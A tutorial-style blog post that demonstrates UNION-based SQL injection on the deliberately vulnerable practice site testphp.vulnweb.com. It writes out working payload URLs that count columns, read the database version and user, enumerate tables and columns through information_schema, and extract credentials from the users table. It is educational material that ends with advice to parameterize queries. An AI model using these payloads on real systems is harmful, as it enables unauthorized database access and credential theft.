.png)
6 months ago
46 BOOK THIS SPACE FOR AD
ARTICLE ADSQL injection is a technique used by attackers that takes advantage of the improper concatenation of user input parameters with code that interacts directly with database queries.
If you are new to the subject and/or want a more complete explanation, I recommend OWASP or Cloudflare, as the aim here is just to review.
As I already mentioned, we will exploit such flaws on the intentionally vulnerable site vulnweb. When we access the “categories” tab and select one of them we see the change in the URL:
http://testphp.vulnweb.com/listproducts.php?cat=1Let’s analyze the “cat” parameter, inserting a single quote:
http://testphp.vulnweb.com/listproducts.php?cat=1'And we got a characteristic SQL syntax error. Almost 100% of the time when this error is present, the page is vulnerable to In-band SQL Injection (since the error is displayed on the application screen itself)!
To proceed, we have to find out the number of columns in this database:
http://testphp.vulnweb.com/listproducts.php?cat=1 ORDER BY 1,2,3When we entered all values up to 3, we did not get any errors. So we need to keep testing until we get it.
So since column 12 does not exist, we conclude that the total number of columns in the database is 11.
Then we choose one of them to inject parameters like @@version (or simply version()), in order to list the MySQL version:
http://testphp.vulnweb.com/listproducts.php?cat=-1%20UNION%20SELECT%201,2,3,4,5,6,@@version,8,9,10,11With the version in hand, an attacker would look for related exploits. But since this is out of scope, let’s move on to user():
http://testphp.vulnweb.com/listproducts.php?cat=-1 UNION SELECT 1,2,3,4,5,6,user(),8,9,10,11To list the tables, we need to understand that there is a standard database in MySQL and the like called information_schema, which contains information (such as tables) about the other schemas.
http://testphp.vulnweb.com/listproducts.php?cat=-1 UNION SELECT 1,2,3,4,5,6,table_name,8,9,10,11 FROM information_schema.tablesIf we scroll further down, we will see a table called users, which is more relevant to our attack.
In the same way that we use information_schema to enumerate the tables, we will list the columns:
http://testphp.vulnweb.com/listproducts.php?cat=-1 UNION SELECT 1,2,3,4,5,6,column_name,8,9,10,11 FROM information_schema.columns WHERE table_name = 'users'And the application returned the columns as expected. Let’s move on to unamein pass.
And finally we got the credentials directly from the database (which by the way are stored in plain text)!
SQL Injection is an extremely critical flaw, as in addition to reading sensitive information from the db, the attacker could delete it, tamper with it, etc. Therefore, it is essential to parameterize SQL queries prepared when interacting with the database.
Thanks!
Bengali (Bangladesh) · 
English (United States) ·